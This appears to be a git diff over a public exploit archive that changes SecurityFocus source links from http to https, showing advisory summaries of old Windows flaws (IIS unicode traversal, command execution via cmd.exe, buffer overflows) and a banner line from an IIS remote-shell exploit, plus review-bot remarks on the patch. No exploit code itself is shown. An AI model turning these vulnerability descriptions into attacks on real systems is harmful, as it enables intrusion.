@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1578/info +source: https://www.securityfocus.com/bid/1578/info Microsoft IIS 5.0 has a dedicated scripting engine for advanced file types such as ASP, ASA, HTR, etc. files. The scripting engines handle requests for these file types, processes them accordingly, and then executes them on the server. diff --git a/exploits/windows/remote/20152.pl b/exploits/windows/remote/20152.pl index c0e10a0a7..d5595c684 100755 --- a/exploits/windows/remote/20152.pl +++ b/exploits/windows/remote/20152.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1578/info +source: https://www.securityfocus.com/bid/1578/info Microsoft IIS 5.0 has a dedicated scripting engine for advanced file types such as ASP, ASA, HTR, etc. files. The scripting engines handle requests for these file types, processes them accordingly, and then executes them on the server. diff --git a/exploits/windows/remote/20180.c b/exploits/windows/remote/20180.c index 3649fef60..cb513e3de 100644 --- a/exploits/windows/remote/20180.c +++ b/exploits/windows/remote/20180.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1614/info +// source: https://www.securityfocus.com/bid/1614/info A number of unchecked buffers exists in Robotex Viking Server. This enables a malicious user to either crash the application or execute arbitrary code, depending on the data supplied. diff --git a/exploits/windows/remote/20182.txt b/exploits/windows/remote/20182.txt index 47ef94ee6..a693b5269 100644 --- a/exploits/windows/remote/20182.txt +++ b/exploits/windows/remote/20182.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1617/info +source: https://www.securityfocus.com/bid/1617/info IPSWITCH ships a product titled IMail, an email server for usage on NT servers serving clients their mail via a web interface. To this end the IMail server provides a web server typically running on port 8383 for it's end users to access. Via this interface users may read and send mail, as well as mail with file attachments. Certain versions of IMail do not perform proper access validation however resulting in users being able to attach files resident on the server. The net result of this is users may attach files on the server to which they should have no access. This access is limited to the user privileges which the server is being run as, typically SYSTEM. diff --git a/exploits/windows/remote/20184.txt b/exploits/windows/remote/20184.txt index 8935ae90d..868726ed4 100644 --- a/exploits/windows/remote/20184.txt +++ b/exploits/windows/remote/20184.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1627/info +source: https://www.securityfocus.com/bid/1627/info IRIS from eEye Digital Security is a protocol analyzer geared towards network management, it is currently in BETA. This product was formerly known as SpyNet CaptureNet. Certain versions of the this software are vulnerable to a remotely triggered buffer overflow attack. This attack is orchestrated by a malicious user launching multiple UDP sessions to random ports on the machine which IRIS resides on (and is in operation on). The net result of this buffer overflow is that the product ceases to function and may drive system resources to 100% before exiting. It may be possible that this overflow (a heap overflow according to the attached advisory) could result in a system compromise. No information indicating that this is the case has been released. diff --git a/exploits/windows/remote/20211.c b/exploits/windows/remote/20211.c index 93b7aa6ee..cfab59eed 100644 
--- a/exploits/windows/remote/20211.c +++ b/exploits/windows/remote/20211.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1657/info +// source: https://www.securityfocus.com/bid/1657/info A number of unchecked static buffers exist in Mobius' DocumentDirect for the Internet program. Depending on the data entered, arbitrary code execution or a denial of service attack could be launched under the privilege level of the corresponding service. diff --git a/exploits/windows/remote/20214.pl b/exploits/windows/remote/20214.pl index 8210615df..fb2ec808a 100755 --- a/exploits/windows/remote/20214.pl +++ b/exploits/windows/remote/20214.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1661/info +source: https://www.securityfocus.com/bid/1661/info A vulnerability exists in the "Session Agent" portion of Firewall-1, from Check Point. This vulnerability appears to affect all versions of the session agent prior to the one shipped in FW-1 4.1. The session agent listens on a Windows 9x or NT box for connections from the firewall, requesting user authentication for connections. This information is all transmitted in cleartext, and is unauthenticated. This means it can be sniffed. In addition, the agent accepts connections from any host. Any person who can connect to the session agent can impersonate the Firewall-1 module, and request username and password information. If supplied, this can result in the compromise of that username and password. diff --git a/exploits/windows/remote/20222.cpp b/exploits/windows/remote/20222.cpp index 3e1fc3075..48966e0c4 100644 --- a/exploits/windows/remote/20222.cpp +++ b/exploits/windows/remote/20222.cpp 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1683/info +source: https://www.securityfocus.com/bid/1683/info By default, the telnet client (telnet.exe) shipped with Microsoft Windows 2000 utilizes Windows NT Challenge/Response (NTLM) as an authentication method. When establishing a connection to a host, the telnet client will attempt authentication via NTLM, regardless of whether or not the host is a Windows telnet server or not. There is a possibility that the NTLM challenge/response authentication session could be monitored and subsequently cracked, which could lead to the disclosure of sensitive information such as usernames, passwords, domains, etc. The NTLM challenge/response protocol is known to be susceptible to brute-force cracking, as demonstrated in the tool "L0phtcrack." diff --git a/exploits/windows/remote/20223.txt b/exploits/windows/remote/20223.txt index 0e843a3dc..6cfe7a0c2 100644 --- a/exploits/windows/remote/20223.txt +++ b/exploits/windows/remote/20223.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1684/info +source: https://www.securityfocus.com/bid/1684/info The Sambar Server was created to test a three-tier communication infrastructure modeled after the Sybase Open Client/Open Server. Soon thereafter, the idea of leveraging the infrastructure for dynamic delivery of content on the WWW resulted in the addition of an HTTP protocol stack, and efforts in supporting the notion of preexistent users via HTTP. diff --git a/exploits/windows/remote/20224.txt b/exploits/windows/remote/20224.txt index 6a7e1cedd..c53c30650 100644 --- a/exploits/windows/remote/20224.txt +++ b/exploits/windows/remote/20224.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1685/info +source: https://www.securityfocus.com/bid/1685/info CamShot is a Windows 95/98/2000/NT web server that serves up web pages containing time stamped images captured from a video camera. The images can be viewed from anywhere on the network with a web browser. CamShot works with Video For Windows compatible video equipment. Certain trial versions of this software contain a possibly exploitable remote buffer overflow by way of a overly long user supplied 'Authorization' password. diff --git a/exploits/windows/remote/20235.pl b/exploits/windows/remote/20235.pl index 8737cd195..741a91a80 100755 --- a/exploits/windows/remote/20235.pl +++ b/exploits/windows/remote/20235.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1705/info +source: https://www.securityfocus.com/bid/1705/info Depending on the data entered, CiscoSecure ACS for Windows NT can be made to crash or arbitrary code execution can be made possible if an unusually long packet is sent to port 2002. diff --git a/exploits/windows/remote/20240.txt b/exploits/windows/remote/20240.txt index c37c32c9a..b6671b881 100644 --- a/exploits/windows/remote/20240.txt +++ b/exploits/windows/remote/20240.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1714/info +source: https://www.securityfocus.com/bid/1714/info Due to a flaw in the method Microsoft Windows Media Player 7 handles OCX controls (ActiveX containers) in embedded in RTF email messages, it is possible to crash RTF-enabled email clients such as Microsoft Outlook and Outlook Express. While this vulnerability lies in the OCX control implementation in Windows Media Player 7, it only affects RTF-enabled email clients. diff --git a/exploits/windows/remote/20243.html b/exploits/windows/remote/20243.html index 596e2112f..dee65d147 100644 --- a/exploits/windows/remote/20243.html +++ b/exploits/windows/remote/20243.html 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1718/info +source: https://www.securityfocus.com/bid/1718/info It is possible for an outside attacker to view known files on a remote system if the target user visits a website or opens an email containing a specially formed script containing the JScript function 'GetObject()' and the ActiveX object 'htmlfile'. Microsoft Internet Explorer or Outlook Express will grant full access to the DOM of a HTML document object if the following code is inserted into HTML formatted document (the 'I" in SCRIPT has been replaced with a "!"): diff --git a/exploits/windows/remote/20247.txt b/exploits/windows/remote/20247.txt index eb7486044..a1987f781 100644 --- a/exploits/windows/remote/20247.txt +++ b/exploits/windows/remote/20247.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1733/info +source: https://www.securityfocus.com/bid/1733/info Smartwin Technology CyberOffice Shopping Cart is a shopping cart application for e-commerce enabled websites running Windows NT 4.0 or 2000. diff --git a/exploits/windows/remote/20248.txt b/exploits/windows/remote/20248.txt index 5ffaee835..01c2d4d24 100644 --- a/exploits/windows/remote/20248.txt +++ b/exploits/windows/remote/20248.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1734/info +source: https://www.securityfocus.com/bid/1734/info Smartwin Technology CyberOffice Shopping Cart is a shopping cart application for e-commerce enabled websites running Windows NT 4.0 or 2000. diff --git a/exploits/windows/remote/20249.txt b/exploits/windows/remote/20249.txt index 7ca5a7c2e..61a6e1709 100644 --- a/exploits/windows/remote/20249.txt +++ b/exploits/windows/remote/20249.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1738/info +source: https://www.securityfocus.com/bid/1738/info It is possible for a malicious website operator to obtain copies of known files on a remote system if a website visitor is running Pegasus Mail client. 
diff --git a/exploits/windows/remote/20266.txt b/exploits/windows/remote/20266.txt index 2a3d20d17..16a2af19f 100644 --- a/exploits/windows/remote/20266.txt +++ b/exploits/windows/remote/20266.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1754/info +source: https://www.securityfocus.com/bid/1754/info If a malicious website operator were to embed a specially crafted java object into a HTML document, it would be possible to execute arbitrary programs on a target host viewing the webpage through either Microsoft Internet Explorer or Outlook. The com.ms.activeX.ActiveXComponent java object inserted into an tag will allow the creation and scripting of arbitrary ActiveX objects even if they may present security hazards. diff --git a/exploits/windows/remote/20269.txt b/exploits/windows/remote/20269.txt index 1258012ae..7939e7a8a 100644 --- a/exploits/windows/remote/20269.txt +++ b/exploits/windows/remote/20269.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1756/info +source: https://www.securityfocus.com/bid/1756/info If Index Server is enabled in Microsoft Internet Information Server 5.0, it is possible for a remote user to view the entire root directory structure and all sub-directories due to a flaw in the Web Distributed Authoring and Versioning (WebDAV) search implementation. Hidden directories, include files (*.inc), or other documents that would not normally be accessible through the regular website interface can be exposed through this exploit. diff --git a/exploits/windows/remote/20283.txt b/exploits/windows/remote/20283.txt index 372cd1766..1ca15d12f 100644 --- a/exploits/windows/remote/20283.txt +++ b/exploits/windows/remote/20283.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1780/info +source: https://www.securityfocus.com/bid/1780/info Share level password protection for the File and Print Sharing service in Windows 95/98/ME can be bypassed. 
diff --git a/exploits/windows/remote/20284.txt b/exploits/windows/remote/20284.txt index 2d448aafe..a124d850b 100644 --- a/exploits/windows/remote/20284.txt +++ b/exploits/windows/remote/20284.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1780/info +source: https://www.securityfocus.com/bid/1780/info Share level password protection for the File and Print Sharing service in Windows 95/98/ME can be bypassed. diff --git a/exploits/windows/remote/20287.c b/exploits/windows/remote/20287.c index 0dcbc8de5..d1831973a 100644 --- a/exploits/windows/remote/20287.c +++ b/exploits/windows/remote/20287.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1789/info +// source: https://www.securityfocus.com/bid/1789/info All-mail is an smtp server for Windows NT and 2000 platforms offered by Nevis Systems. It is vulnerable to remotely exploitable buffer overflow attacks that may lead to an attacker gaining control of the victim host. diff --git a/exploits/windows/remote/20288.c b/exploits/windows/remote/20288.c index d4ac05d7b..89c9c3443 100644 --- a/exploits/windows/remote/20288.c +++ b/exploits/windows/remote/20288.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1796/info +// source: https://www.securityfocus.com/bid/1796/info The file sharing (SMB) service in Windows enables client applications to access and modify files from a server on the network. diff --git a/exploits/windows/remote/20298.c b/exploits/windows/remote/20298.c index aa1cc65c9..c61405a63 100644 --- a/exploits/windows/remote/20298.c +++ b/exploits/windows/remote/20298.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1806/info +// source: https://www.securityfocus.com/bid/1806/info Microsoft IIS 4.0 and 5.0 are both vulnerable to double dot "../" directory traversal exploitation if extended UNICODE character representations are used in substitution for "/" and "\". 
diff --git a/exploits/windows/remote/20299.pl b/exploits/windows/remote/20299.pl index 5369ed50f..d999fe409 100755 --- a/exploits/windows/remote/20299.pl +++ b/exploits/windows/remote/20299.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1806/info +source: https://www.securityfocus.com/bid/1806/info Microsoft IIS 4.0 and 5.0 are both vulnerable to double dot "../" directory traversal exploitation if extended UNICODE character representations are used in substitution for "/" and "\". diff --git a/exploits/windows/remote/20300.c b/exploits/windows/remote/20300.c index 4ba236f77..1573132d8 100644 --- a/exploits/windows/remote/20300.c +++ b/exploits/windows/remote/20300.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1806/info +// source: https://www.securityfocus.com/bid/1806/info Microsoft IIS 4.0 and 5.0 are both vulnerable to double dot "../" directory traversal exploitation if extended UNICODE character representations are used in substitution for "/" and "\". diff --git a/exploits/windows/remote/20301.php b/exploits/windows/remote/20301.php index de893d9ed..b84bdd183 100644 --- a/exploits/windows/remote/20301.php +++ b/exploits/windows/remote/20301.php @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1806/info +source: https://www.securityfocus.com/bid/1806/info Microsoft IIS 4.0 and 5.0 are both vulnerable to double dot "../" directory traversal exploitation if extended UNICODE character representations are used in substitution for "/" and "\". diff --git a/exploits/windows/remote/20302.pl b/exploits/windows/remote/20302.pl index 1a1e3645b..a27e0cd6e 100755 --- a/exploits/windows/remote/20302.pl +++ b/exploits/windows/remote/20302.pl 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1806/info +source: https://www.securityfocus.com/bid/1806/info Microsoft IIS 4.0 and 5.0 are both vulnerable to double dot "../" directory traversal exploitation if extended UNICODE character representations are used in substitution for "/" and "\". @@ -679,7 +679,7 @@ print "\n IIS-PLUS shell v 3.7 by SPABAM. 2002. spabam\@yahoo.com"; print "\n -http://www.securityfocus.com/bid/1806/exploit/ +https://www.securityfocus.com/bid/1806/exploit/ "; print "\n A IIS HTTP exploit for Micro\$oft WebServers using 450 URL."; print "\n diff --git a/exploits/windows/remote/20305.txt b/exploits/windows/remote/20305.txt index b3f52dec1..3b6d23db7 100644 --- a/exploits/windows/remote/20305.txt +++ b/exploits/windows/remote/20305.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1811/info +source: https://www.securityfocus.com/bid/1811/info Microsoft Site Server is an intranet server designed for an NT Server with IIS. Site Server enables users to locate and view information stored in various locations through personalized web pages and emails. diff --git a/exploits/windows/remote/20306.html b/exploits/windows/remote/20306.html index 8eed91aa9..c9ae62257 100644 --- a/exploits/windows/remote/20306.html +++ b/exploits/windows/remote/20306.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1812/info +source: https://www.securityfocus.com/bid/1812/info An attacker may gain read access on remote systems by specifying a custom codebase in a Java applet, and delivering to the victim(s) via HTML email or a website. Any arbitrary codebase can be referenced by a java applet that was loaded by an tag in conjunction with a jar file when using Microsoft Internet Explorer or Outlook/Outlook Express. This allows for the possibility of any known file to be read by a remote attacker. diff --git a/exploits/windows/remote/20309.txt b/exploits/windows/remote/20309.txt index 891b5677a..6092b7cf6 100644 
--- a/exploits/windows/remote/20309.txt +++ b/exploits/windows/remote/20309.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1818/info +source: https://www.securityfocus.com/bid/1818/info Microsoft IIS 3.0 came with a sample program, newdsn.exe, installed by default in the directory wwwroot/scripts/tools/. Execution of this program with a properly submitted URL could allow for remote file creation. The file created is a Microsoft Access Database, but can have any extension, including .html. diff --git a/exploits/windows/remote/20324.txt b/exploits/windows/remote/20324.txt index b1e0bed5d..c153bea4d 100644 --- a/exploits/windows/remote/20324.txt +++ b/exploits/windows/remote/20324.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1839/info +source: https://www.securityfocus.com/bid/1839/info Acquiring access to known files outside of the web root is possible through directory traversal techniques in both iPlanet Certificate Management System (CMS). This is made possible through the use of "\../" in a HTTP request. The following services are affected by this vulnerability: diff --git a/exploits/windows/remote/20325.txt b/exploits/windows/remote/20325.txt index 6fd56216d..c3a18b24b 100644 --- a/exploits/windows/remote/20325.txt +++ b/exploits/windows/remote/20325.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1839/info +source: https://www.securityfocus.com/bid/1839/info Acquiring access to known files outside of the web root is possible through directory traversal techniques in Netscape Directory Server. This is made possible through the use of "\../" in a HTTP request. The following services are affected by this vulnerability: diff --git a/exploits/windows/remote/20334.java b/exploits/windows/remote/20334.java index bb1876beb..f1fe2c6f1 100644 --- a/exploits/windows/remote/20334.java +++ b/exploits/windows/remote/20334.java 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1860/info +source: https://www.securityfocus.com/bid/1860/info FTP Serv-U is an internet FTP server from CatSoft. diff --git a/exploits/windows/remote/20335.txt b/exploits/windows/remote/20335.txt index 9572105bb..1f737a554 100644 --- a/exploits/windows/remote/20335.txt +++ b/exploits/windows/remote/20335.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1861/info +source: https://www.securityfocus.com/bid/1861/info A cross-site scripting vulnerability has been reported in Microsoft Indexing Services for Windows 2000/NT4 and its handling of the .htw extension. If a user inadvertantly opened a hostile link through a browser or HTML compliant e-mail client, active content such as JavaScript may be executed. For example, the following link when processed by IIS will yield successful exploitation: diff --git a/exploits/windows/remote/20371.txt b/exploits/windows/remote/20371.txt index 7f66134fd..9d01c410a 100644 --- a/exploits/windows/remote/20371.txt +++ b/exploits/windows/remote/20371.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1884/info +source: https://www.securityfocus.com/bid/1884/info Samba is a set of of programs that allow Windows® clients access to a Unix server's filespace and printers over NetBIOS. A directory traversal vulnerability exists in Microsoft's implementation of the SMB file and print sharing protocol for Windows 95 build 490.r6 and Windows for Workgroups. diff --git a/exploits/windows/remote/20375.txt b/exploits/windows/remote/20375.txt index 692c4e5a9..056bfc09b 100644 --- a/exploits/windows/remote/20375.txt +++ b/exploits/windows/remote/20375.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1891/info +source: https://www.securityfocus.com/bid/1891/info A vulnerability exists in Sun Microsystems' JavaWebServer for Win32, version 1.1Beta. JavaWebServer is a Java-oriented web application development platform. 
diff --git a/exploits/windows/remote/20384.txt b/exploits/windows/remote/20384.txt index 089446c7b..34e3661e5 100644 --- a/exploits/windows/remote/20384.txt +++ b/exploits/windows/remote/20384.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1912/info +source: https://www.securityfocus.com/bid/1912/info When Microsoft IIS receives a valid request for an executable file, the filename is then passed onto the underlying operating system which executes the file. In the event that IIS receives a specially formed request for an executable file followed by operating system commands, IIS will proceed to process the entire string rather than rejecting it. Thus, a malicious user may perform system commands through cmd.exe under the context of the IUSR_machinename account which could possibly lead to privilege escalation, deletion, addition, and modification of files, or full compromise of the server. diff --git a/exploits/windows/remote/20399.html b/exploits/windows/remote/20399.html index d1efe6f09..4214db9e0 100644 --- a/exploits/windows/remote/20399.html +++ b/exploits/windows/remote/20399.html @@ -1,5 +1,5 @@
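Review bot: In the .c hunks (20180.c, 20211.c, 20287.c, 20288.c, 20298.c, 20300.c) the `//` prefix is added to the source line only, while the advisory text in the unchanged context lines right after it (for example "A number of unchecked buffers exists in Robotex Viking Server.") is still shown as bare prose. Line 1 becomes a comment but the rest of the header does not. If the goal is a header the C compiler ignores, wrap the whole description in a block comment in the same change. If the goal is only the scheme update, drop the `//` so the diff stays a pure http to https substitution.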
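Review bot: The comment prefix is applied inconsistently across source files: the 20222.cpp and 20334.java hunks keep an uncommented `+source: https://...` first line, while every .c hunk in this patch gets `+// source: https://...`. C++ and Java both accept `//` line comments, so either give these two hunks the same prefix or state in the commit message why only .c files are treated. The .pl hunks (20148.pl, 20151.pl, 20152.pl, 20214.pl, 20235.pl, 20299.pl, 20302.pl) also keep the uncommented form and should be covered by whatever policy is chosen.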
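Review bot: The second hunk of 20302.pl (`@@ -679,7 +679,7 @@`) rewrites a URL that sits inside a multi-line print string, between `print "\n` and `";`, so unlike the line-1 changes it alters what the script prints at runtime rather than file metadata. Confirm the bulk substitution was meant to reach string literals. If the intent was only to update the `source:` headers, restrict the replacement to line 1 of each file and leave this banner text alone.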